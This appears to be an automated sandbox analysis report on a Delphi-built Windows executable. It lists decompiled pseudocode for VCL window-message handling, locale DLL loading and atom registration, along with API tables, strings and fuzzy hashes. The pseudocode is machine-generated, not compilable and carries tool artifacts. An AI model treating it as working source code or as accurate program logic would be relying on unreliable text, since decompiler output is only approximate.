				struct HWND__* _t224;
				struct HWND__* _t227;
				struct HWND__* _t231;
				struct HWND__* _t245;
				struct HWND__* _t249;
				struct HWND__* _t251;
				struct HWND__* _t252;
				struct HWND__* _t264;
				intOrPtr _t267;
				struct HWND__* _t270;
				intOrPtr* _t271;
				struct HWND__* _t279;
				struct HWND__* _t281;
				struct HWND__* _t292;
				void* _t301;
				signed int _t303;
				struct HWND__* _t309;
				struct HWND__* _t310;
				struct HWND__* _t311;
				void* _t312;
				intOrPtr _t335;
				struct HWND__* _t339;
				intOrPtr _t361;
				void* _t365;
				struct HWND__* _t370;
				void* _t371;
				void* _t372;
				intOrPtr _t373;

				_t312 = __ecx;
				_push(_t365);
				_v12 = __edx;
				_v8 = __eax;
				_push(_t372);
				_push(0x45858c);
				_push( *[fs:edx]);
				 *[fs:edx] = _t373;
				 *(_v12 + 0xc) = 0;
				_t301 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1;
				if(_t301 < 0) {
					L5:
					E00457DB0(_v8, _t312, _v12);
					_t303 =  *_v12;
					_t161 = _t303;
					__eflags = _t161 - 0x53;
					if(__eflags > 0) {
						__eflags = _t161 - 0xb017;
						if(__eflags > 0) {
							__eflags = _t161 - 0xb020;
							if(__eflags > 0) {
								_t162 = _t161 - 0xb031;
								__eflags = _t162;
								if(_t162 == 0) {
									_t163 = _v12;
									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
									if( *((intOrPtr*)(_t163 + 4)) != 1) {
										 *(_v8 + 0xb0) =  *(_v12 + 8);
									} else {
										 *(_v12 + 0xc) =  *(_v8 + 0xb0);
									}
									L99:
									_t166 = 0;
									_pop(_t335);
									 *[fs:eax] = _t335;
									goto L100;
								}
								__eflags = _t162 + 0xfffffff2 - 2;
								if(_t162 + 0xfffffff2 - 2 < 0) {
									 *(_v12 + 0xc) = E00459E54(_v8,  *(_v12 + 8), _t303) & 0x0000007f;
								} else {
									L98:
									E00457E74(_t372); // executed
								}
								goto L99;
							}
							if(__eflags == 0) {
								_t176 = _v12;
								__eflags =  *(_t176 + 4);
								if( *(_t176 + 4) != 0) {
									E00458AF8(_v8, _t312,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								} else {
									E00458A9C(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
								}
								goto L99;
							}
							_t185 = _t161 - 0xb01a;
							__eflags = _t185;
							if(_t185 == 0) {
								_t188 = IsIconic( *(_v8 + 0x30));
								__eflags = _t188;
								if(_t188 == 0) {
									_t189 = GetFocus();
									_t339 = _v8;
									__eflags = _t189 -  *((intOrPtr*)(_t339 + 0x30));
									if(_t189 ==  *((intOrPtr*)(_t339 + 0x30))) {
										_t191 = E0044FE3C(0);
										__eflags = _t191;
										if(_t191 != 0) {
											SetFocus(_t191);
										}
									}
								}
								goto L99;
							}
							__eflags = _t185 == 5;
							if(_t185 == 5) {
								L88:
								E00458FDC(_v8,  *(_v12 + 8),  *(_v12 + 4));
								goto L99;
							} else {
								goto L98;
							}
						}
						if(__eflags == 0) {
							_t197 =  *(_v8 + 0x44);
							__eflags = _t197;
							if(_t197 != 0) {
								_t367 = _t197;
								_t199 = E0043F370(_t197);
								__eflags = _t199;
								if(_t199 != 0) {
									_t202 = IsWindowEnabled(E0043F370(_t367));
									__eflags = _t202;
									if(_t202 != 0) {
										_t205 = IsWindowVisible(E0043F370(_t367));
										__eflags = _t205;
										if(_t205 != 0) {
											 *0x471b18 = 0;
											_t206 = GetFocus();
											SetFocus(E0043F370(_t367));
											E00439EA4(_t367,  *(_v12 + 4), 0x112,  *(_v12 + 8));
											SetFocus(_t206);
											 *0x471b18 = 1;
											 *(_v12 + 0xc) = 1;
										}
									}
								}
							}
							goto L99;
						}
						__eflags = _t161 - 0xb000;
						if(__eflags > 0) {
							_t216 = _t161 - 0xb001;
							__eflags = _t216;
							if(_t216 == 0) {
								_t217 = _v8;
								__eflags =  *((short*)(_t217 + 0xf2));
								if( *((short*)(_t217 + 0xf2)) != 0) {
									 *((intOrPtr*)(_v8 + 0xf0))();
								}
								goto L99;
							}
							__eflags = _t216 == 0x15;
							if(_t216 == 0x15) {
								_t222 = E00458974(_v8, _t312, _v12);
								__eflags = _t222;
								if(_t222 != 0) {
									 *(_v12 + 0xc) = 1;
								}
								goto L99;
							} else {
								goto L98;
							}
						}
						if(__eflags == 0) {
							_t224 = _v8;
							__eflags =  *((short*)(_t224 + 0xfa));
							if( *((short*)(_t224 + 0xfa)) != 0) {
								 *((intOrPtr*)(_v8 + 0xf8))();
							}
							goto L99;
						}
						_t227 = _t161 - 0x112;
						__eflags = _t227;
						if(_t227 == 0) {
							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
							__eflags = _t231;
							if(_t231 == 0) {
								E004585F0(_v8);
							} else {
								__eflags = _t231 == 0x100;
								if(_t231 == 0x100) {
									E004586A0(_v8);
								} else {
									E00457E74(_t372);
								}
							}
							goto L99;
						}
						__eflags = _t227 + 0xffffffe0 - 7;
						if(_t227 + 0xffffffe0 - 7 < 0) {
							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t303 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
							goto L99;
						} else {
							goto L98;
						}
					}
					if(__eflags == 0) {
						goto L88;
					}
					__eflags = _t161 - 0x16;
					if(__eflags > 0) {
						__eflags = _t161 - 0x1d;
						if(__eflags > 0) {
							_t245 = _t161 - 0x37;
							__eflags = _t245;
							if(_t245 == 0) {
								 *(_v12 + 0xc) = E004585D4(_v8);
								goto L99;
							}
							__eflags = _t245 == 0x13;
							if(_t245 == 0x13) {
								_t249 = _v12;
								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t249 + 8)))) - 0xde534454;
								if( *((intOrPtr*)( *((intOrPtr*)(_t249 + 8)))) == 0xde534454) {
									_t251 = _v8;
									__eflags =  *((char*)(_t251 + 0x9e));
									if( *((char*)(_t251 + 0x9e)) != 0) {
										_t252 = _v8;
										__eflags =  *(_t252 + 0xa0);
										if( *(_t252 + 0xa0) != 0) {
											 *(_v12 + 0xc) = 0;
										} else {
											_t309 = E0040BB68("vcltest3.dll", _t303, 0x8000);
											 *(_v8 + 0xa0) = _t309;
											__eflags = _t309;
											if(_t309 == 0) {
												 *(_v12 + 0xc) = GetLastError();
												 *(_v8 + 0xa0) = 0;
											} else {
												 *(_v12 + 0xc) = 0;
												_t370 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation");
												_t310 = _t370;
												__eflags = _t370;
												if(_t370 != 0) {
													_t264 =  *(_v12 + 8);
													_t310->i( *((intOrPtr*)(_t264 + 4)),  *((intOrPtr*)(_t264 + 8)));
												}
											}
										}
									}
								}
								goto L99;
							} else {
								goto L98;
							}
						}
						if(__eflags == 0) {
							_t267 =  *0x48fc00; // 0x21d0f1c
							E00457418(_t267);
							E00457E74(_t372);
							goto L99;
						}
						_t270 = _t161 - 0x1a;
						__eflags = _t270;
						if(_t270 == 0) {
							_t271 =  *0x48e808; // 0x48fb64
							E00443BBC( *_t271, _t312,  *(_v12 + 4));
							E00457E08(_v8, _t303, _t312, _v12, _t365);
							E00457E74(_t372);
							goto L99;
						}
						__eflags = _t270 == 2;
						if(_t270 == 2) {
							E00457E74(_t372);
							_t279 = _v12;
							__eflags =  *((intOrPtr*)(_t279 + 4)) - 1;
							asm("sbb eax, eax");
							 *((char*)(_v8 + 0x9d)) = _t279 + 1;
							_t281 = _v12;
							__eflags =  *(_t281 + 4);
							if( *(_t281 + 4) == 0) {
								E00457D04();
								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0);
							} else {
								E00457D14(_v8);
								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0);
							}
							goto L99;
						} else {
							goto L98;
						}
					}
					if(__eflags == 0) {
						_t292 = _v12;
						__eflags =  *(_t292 + 4);
						if( *(_t292 + 4) != 0) {
							 *((char*)(_v8 + 0x9c)) = 1;
						}
						goto L99;
					}
					__eflags = _t161 - 0x14;
					if(_t161 > 0x14) {
						goto L98;
					}
					switch( *((intOrPtr*)(_t161 * 4 +  &M00457FA0))) {
						case 0:
							__eax = E0041BC00();
							goto L99;
						case 1:
							goto L98;
						case 2:
							_push(0);
							_push(0);
							_push(0xb01a);
							_v8 =  *(_v8 + 0x30);
							_push( *(_v8 + 0x30));
							L00407050();
							__eax = E00457E74(__ebp);
							goto L99;
						case 3:
							__eax = _v12;
							__eflags =  *(__eax + 4);
							if( *(__eax + 4) == 0) {
								__eax = E00457E74(__ebp);
								__eax = _v8;
								__eflags =  *(__eax + 0xac);
								if( *(__eax + 0xac) == 0) {
									__eax = _v8;
									__eax =  *(_v8 + 0x30);
									__eax = E0044FCEC( *(_v8 + 0x30), __ebx, __edi, __esi);
									__edx = _v8;
									 *(_v8 + 0xac) = __eax;
								}
								_v8 = L00457D0C();
							} else {
								_v8 = E00457D14(_v8);
								__eax = _v8;
								__eax =  *(_v8 + 0xac);
								__eflags = __eax;
								if(__eax != 0) {
									__eax = _v8;
									__edx = 0;
									__eflags = 0;
									 *(_v8 + 0xac) = 0;
								}
								__eax = E00457E74(__ebp);
							}
							goto L99;
						case 4:
							__eax = _v8;
							__eax =  *(_v8 + 0x30);
							_push(__eax);
							L00406FB0();
							__eflags = __eax;
							if(__eax == 0) {
								__eax = E00457E74(__ebp);
							} else {
								__eax = E00457EB0(__ebp);
							}
							goto L99;
						case 5:
							__eax = _v8;
							__eax =  *(_v8 + 0x44);
							__eflags = __eax;
							if(__eax != 0) {
								__eax = E00455680(__eax, __ecx);
							}
							goto L99;
						case 6:
							__eax = _v12;
							 *_v12 = 0x27;
							__eax = E00457E74(__ebp);
							goto L99;
					}
				} else {
					_t311 = _t301 + 1;
					_t371 = 0;
					L2:
					L2:
					if( *((intOrPtr*)(E004140D0( *((intOrPtr*)(_v8 + 0xa8)), _t371)))() == 0) {
						goto L4;
					} else {
						_t166 = 0;
						_pop(_t361);
						 *[fs:eax] = _t361;
					}
					L100:
					return _t166;
					L4:
					_t371 = _t371 + 1;
					_t311 = _t311 - 1;
					__eflags = _t311;
					if(_t311 != 0) {
						goto L2;
					}
					goto L5;
				}
			}

0x00457efc
0x00457f03
0x00457f05
0x00457f08
0x00457f0d
0x00457f0e
0x00457f13
0x00457f16
0x00457f1e
0x00457f2d
0x00457f30
0x00457f64
0x00457f6a
0x00457f72
0x00457f74
0x00457f76
0x00457f79
0x0045802d
0x00458032
0x00458078
0x0045807d
0x0045809e
0x0045809e
0x004580a3
0x00458510
0x00458513
0x00458517
0x00458533
0x00458519
0x00458525
0x00458525
0x00458582
0x00458582
0x00458584
0x00458587
0x00000000
0x00458587
0x004580ac
0x004580af
0x0045836e
0x004580b5
0x0045857b
0x0045857c
0x00458581
0x00000000
0x004580af
0x0045807f
0x004584da
0x004584dd
0x004584e1
0x00458509
0x004584e3
0x004584f1
0x004584f1
0x00000000
0x004584e1
0x00458085
0x00458085
0x0045808a
0x00458488
0x0045848d
0x0045848f
0x00458495
0x0045849a
0x0045849d
0x004584a0
0x004584a8
0x004584ad
0x004584af
0x004584b6
0x004584b6
0x004584af
0x004584a0
0x00000000
0x0045848f
0x00458090
0x00458093
0x004584c0
0x004584d0
0x00000000
0x00458099
0x00000000
0x00458099
0x00458093
0x00458034
0x0045839b
0x0045839e
0x004583a0
0x004583a6
0x004583aa
0x004583af
0x004583b1
0x004583bf
0x004583c4
0x004583c6
0x004583d4
0x004583d9
0x004583db
0x004583e1
0x004583e8
0x004583f7
0x00458410
0x00458416
0x0045841b
0x00458425
0x00458425
0x004583db
0x004583c6
0x004583b1
0x00000000
0x004583a0
0x0045803a
0x0045803f
0x0045805f
0x0045805f
0x00458064
0x00458459
0x0045845c
0x00458464
0x00458476
0x00458476
0x00000000
0x00458464
0x0045806a
0x0045806d
0x0045837c
0x00458381
0x00458383
0x0045838c
0x0045838c
0x00000000
0x00458073
0x00000000
0x00458073
0x0045806d
0x00458041
0x00458431
0x00458434
0x0045843c
0x0045844e
0x0045844e
0x00000000
0x0045843c
0x00458047
0x00458047
0x0045804c
0x004580c5
0x004580c5
0x004580ca
0x004580d8
0x004580cc
0x004580cc
0x004580d1
0x004580e5
0x004580d3
0x004580f0
0x004580f5
0x004580d1
0x00000000
0x004580ca
0x00458051
0x00458054
0x0045827d
0x00000000
0x0045805a
0x00000000
0x0045805a
0x00458054
0x00457f7f
0x00000000
0x00000000
0x00457f85
0x00457f88
0x00457ff4
0x00457ff7
0x00458016
0x00458016
0x00458019
0x0045815b
0x00000000
0x0045815b
0x0045801f
0x00458022
0x004582a1
0x004582a7
0x004582ad
0x004582b3
0x004582b6
0x004582bd
0x004582c3
0x004582c6
0x004582cd
0x0045834d
0x004582cf
0x004582de
0x004582e3
0x004582e9
0x004582eb
0x00458335
0x0045833d
0x004582ed
0x004582f2
0x00458309
0x0045830b
0x0045830d
0x0045830f
0x00458318
0x00458326
0x00458326
0x0045830f
0x004582eb
0x004582cd
0x004582bd
0x00000000
0x00458028
0x00000000
0x00458028
0x00458022
0x00457ff9
0x00458561
0x00458566
0x0045856c
0x00000000
0x00458571
0x00457fff
0x00457fff
0x00458002
0x00458541
0x00458548
0x00458553
0x00458559
0x00000000
0x0045855e
0x00458008
0x0045800b
0x00458185
0x0045818b
0x0045818e
0x00458192
0x00458198
0x0045819e
0x004581a1
0x004581a5
0x004581cc
0x004581e1
0x004581a7
0x004581aa
0x004581bf
0x004581bf
0x00000000
0x00458011
0x00000000
0x00458011
0x0045800b
0x00457f8a
0x00458285
0x00458288
0x0045828c
0x00458295
0x00458295
0x00000000
0x0045828c
0x00457f90
0x00457f93
0x00000000
0x00000000
0x00457f99
0x00000000
0x00458574
0x00000000
0x00000000
0x00000000
0x00000000
0x00458163
0x00458165
0x00458167
0x0045816f
0x00458172
0x00458173
0x00458179
0x00000000
0x00000000
0x004581eb
0x004581ee
0x004581f2
0x00458226
0x0045822c
0x0045822f
0x00458236
0x00458238
0x0045823b
0x0045823e
0x00458243
0x00458246
0x00458246
0x0045824f
0x004581f4
0x004581f7
0x004581fc
0x004581ff
0x00458205
0x00458207
0x0045820e
0x00458211
0x00458211
0x00458213
0x00458213
0x0045821a
0x0045821f
0x00000000
0x00000000
0x00458113
0x00458116
0x00458119
0x0045811a
0x0045811f
0x00458121
0x00458130
0x00458123
0x00458124
0x00458129
0x00000000
0x00000000
0x004580fb
0x004580fe
0x00458101
0x00458103
0x00458109
0x00458109
0x00000000
0x00000000
0x0045813b
0x0045813e
0x00458145
0x00000000
0x00000000
0x00457f32
0x00457f32
0x00457f33
0x00000000
0x00457f35
0x00457f51
0x00000000
0x00457f53
0x00457f53
0x00457f55
0x00457f58
0x00457f58
0x004585a1
0x004585a7
0x00457f60
0x00457f60
0x00457f61
0x00457f61
0x00457f62
0x00000000
0x00000000
0x00000000
0x00457f62

Strings

vcltest3.dll, xrefs: 004582D4
RegisterAutomation, xrefs: 004582F5

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: RegisterAutomation$vcltest3.dll
API String ID: 0-2963190186
Opcode ID: 5cd4afffb3323ad7217636889ebc45e13a21d729b49be7357212e6fd45c716a9
Instruction ID: b1d9b3bcd28d704f93b440f0cbd87eb195104d8ee60cfb3cab24f4fd71e64ee2
Opcode Fuzzy Hash: 5cd4afffb3323ad7217636889ebc45e13a21d729b49be7357212e6fd45c716a9
Instruction Fuzzy Hash: 0DE17F30A04208EFD700DB59C585A5EBBB1BB04315F6885ABEC45AB353DF38EE49DB49

Uniqueness

Uniqueness Score: -1.00%

Function 00405D84, Relevance: 15.1, APIs: 10, Instructions: 98
stringlibrarythreadCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00405D84() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L00401310();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L00401318();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L00401310();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L00401310();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L00401310();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}

0x00405d84
0x00405d8c
0x00405d93
0x00405d94
0x00405da7
0x00405dac
0x00405db5
0x00405e9e
0x00405ea5
0x00405dcb
0x00405dcb
0x00405dd1
0x00405dd2
0x00405ddf
0x00405de4
0x00405de7
0x00405de3
0x00000000
0x00405de3
0x00405df3
0x00405dfb
0x00405e01
0x00405e06
0x00405e13
0x00405e17
0x00405e18
0x00405e19
0x00405e2e
0x00405e2e
0x00405e32
0x00405e4b
0x00405e4f
0x00405e50
0x00405e51
0x00405e61
0x00405e66
0x00405e6a
0x00405e6c
0x00405e81
0x00405e85
0x00405e86
0x00405e87
0x00405e97
0x00405e9c
0x00405e9c
0x00405e6a
0x00405e32
0x00000000
0x00405dfb

APIs

lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405D94
GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405DA1
GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405DA7
lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405DD2
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E19
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E29
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E51
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E61
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405E87
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405E97

Strings

Software\Borland\Locales, xrefs: 00405CA8, 00405CC6
Software\Borland\Delphi\Locales, xrefs: 00405CE4

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-2375825460
Opcode ID: cb28f160dafa1149e6bab2272285a120a5385a2738fad10cdcded8b14b4c15f3
Instruction ID: 1996122f5b3b820df51850e3b8abf2c553d6293b2967b506f70bd3d03d36238e
Opcode Fuzzy Hash: cb28f160dafa1149e6bab2272285a120a5385a2738fad10cdcded8b14b4c15f3
Instruction Fuzzy Hash: 82315071E0061C2AFB25D6B8DC8ABEF66AC8B04384F4441F7B644F61C1DA789F848F94

Uniqueness

Uniqueness Score: -1.00%

Function 00444250, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00444250(void* __ecx, void* __edi, void* __esi) {
				intOrPtr _t6;
				intOrPtr _t8;
				intOrPtr _t10;
				intOrPtr _t12;
				intOrPtr _t14;
				void* _t16;
				void* _t17;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t28;

				_t25 = __esi;
				_t17 = __ecx;
				_push(_t28);
				_push(0x4442d6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t28;
				 *0x48fb6c =  *0x48fb6c - 1;
				if( *0x48fb6c < 0) {
					 *0x48fb68 = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
					_t31 =  *0x48fb68;
					E0044401C(_t16, __edi,  *0x48fb68);
					_t6 =  *0x434730; // 0x43477c
					E00413700(_t6, _t16, _t17,  *0x48fb68);
					_t8 =  *0x434730; // 0x43477c
					E004137A0(_t8, _t16, _t17, _t31);
					_t21 =  *0x434730; // 0x43477c
					_t10 =  *0x4458dc; // 0x445928
					E0041374C(_t10, _t16, _t21, __esi, _t31);
					_t22 =  *0x434730; // 0x43477c
					_t12 =  *0x4442e0; // 0x44432c
					E0041374C(_t12, _t16, _t22, __esi, _t31);
					_t23 =  *0x434730; // 0x43477c
					_t14 =  *0x444494; // 0x4444e0
					E0041374C(_t14, _t16, _t23, _t25, _t31);
				}
				_pop(_t20);
				 *[fs:eax] = _t20;
				_push(0x4442dd);
				return 0;
			}

0x00444250
0x00444250
0x00444255
0x00444256
0x0044425b
0x0044425e
0x00444261
0x00444268
0x00444278
0x00444278
0x0044427f
0x00444284
0x00444289
0x0044428e
0x00444293
0x00444298
0x0044429e
0x004442a3
0x004442a8
0x004442ae
0x004442b3
0x004442b8
0x004442be
0x004442c3
0x004442c3
0x004442ca
0x004442cd
0x004442d0
0x004442d5

APIs

GetVersion.KERNEL32(00000000,004442D6), ref: 0044426A

Part of subcall function 0044401C: GetCurrentProcessId.KERNEL32(?,00000000,00444194), ref: 0044403D
Part of subcall function 0044401C: GlobalAddAtomA.KERNEL32 ref: 00444070
Part of subcall function 0044401C: GetCurrentThreadId.KERNEL32 ref: 0044408B
Part of subcall function 0044401C: GlobalAddAtomA.KERNEL32 ref: 004440C1
Part of subcall function 0044401C: RegisterClipboardFormatA.USER32 ref: 004440D7
Part of subcall function 0044401C: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00444194), ref: 0044415B
Part of subcall function 0044401C: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 0044416C

Strings

DD, xrefs: 004442BE
,CD, xrefs: 004442AE
|GC, xrefs: 00444284, 0044428E, 00444298, 004442A8, 004442B8
(YD, xrefs: 0044429E

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
String ID: (YD$,CD$|GC$DD
API String ID: 3775504709-3582542479
Opcode ID: 26293d3d33b5a23c2d3de9eb7b343b5a76a1fb54df860bdee2b58c18c2512987
Instruction ID: f65b616b6b64fb2421420fd6d6af48ed32fddbf6d5f26329c14427d1c2375db4
Opcode Fuzzy Hash: 26293d3d33b5a23c2d3de9eb7b343b5a76a1fb54df860bdee2b58c18c2512987
Instruction Fuzzy Hash: 4CF04FB82246809FE611EF26FC52A593394F7C67053A1847AF440836B6C738BD518B8C

Uniqueness

Uniqueness Score: -1.00%

Function 00457E74, Relevance: 1.5, APIs: 1, Instructions: 24
nativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00457E74(intOrPtr _a4) {
				intOrPtr _t26;

				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
				_push(_t26); // executed
				L00406D08(); // executed
				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
				return _t26;
			}

0x00457e80
0x00457e8a
0x00457e93
0x00457e9a
0x00457e9d
0x00457e9e
0x00457ea9
0x00457ead

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00457E9E

Memory Dump Source

Source File: 00000000.00000002.680147220.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680142416.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680210304.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680214563.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680220972.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680224863.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680231441.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 763f9b8dc42cb0fabb36a49688d880cb4635935600fc2a0dd726c6e93b0b0ea9
Instruction ID: beed15686c4b45b1ace3871d790c62323329b873bdaa2c708029d08bdaf2a4e1
Opcode Fuzzy Hash: 763f9b8dc42cb0fabb36a49688d880cb4635935600fc2a0dd726c6e93b0b0ea9
Instruction Fuzzy Hash: 8EF0C579215608AFDB40DF9DD588D4AFBE8BF4C260B458195F988CB321C234FD808F90

Uniqueness

Uniqueness Score: -1.00%

Function 0044401C, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 103
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0044401C(void* __ebx, void* __edi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				long _v28;
				char _v32;
				char _v36;
				intOrPtr _t25;
				char _t29;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t50;
				intOrPtr _t53;
				struct HINSTANCE__* _t63;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr _t83;
				void* _t87;

				_v20 = 0;
				_v8 = 0;
				_push(_t87);
				_push(0x444194);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87 + 0xffffffe0;
				_v16 = GetCurrentProcessId();
				_v12 = 0;
				E004092D8("Delphi%.8X", 0,  &_v16,  &_v8);
				E00404374(0x48fb74, _v8);
				_t25 =  *0x48fb74; // 0x21d0e78
				 *0x48fb70 = GlobalAddAtomA(E004047D0(_t25));
				_t29 =  *0x48f714; // 0x400000
				_v36 = _t29;
				_v32 = 0;
				_v28 = GetCurrentThreadId();
				_v24 = 0;
				E004092D8("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
				E00404374(0x48fb78, _v20);
				_t35 =  *0x48fb78; // 0x21d0e94
				 *0x48fb72 = GlobalAddAtomA(E004047D0(_t35));
				_t38 =  *0x48fb78; // 0x21d0e94
				 *0x48fb7c = RegisterClipboardFormatA(E004047D0(_t38));
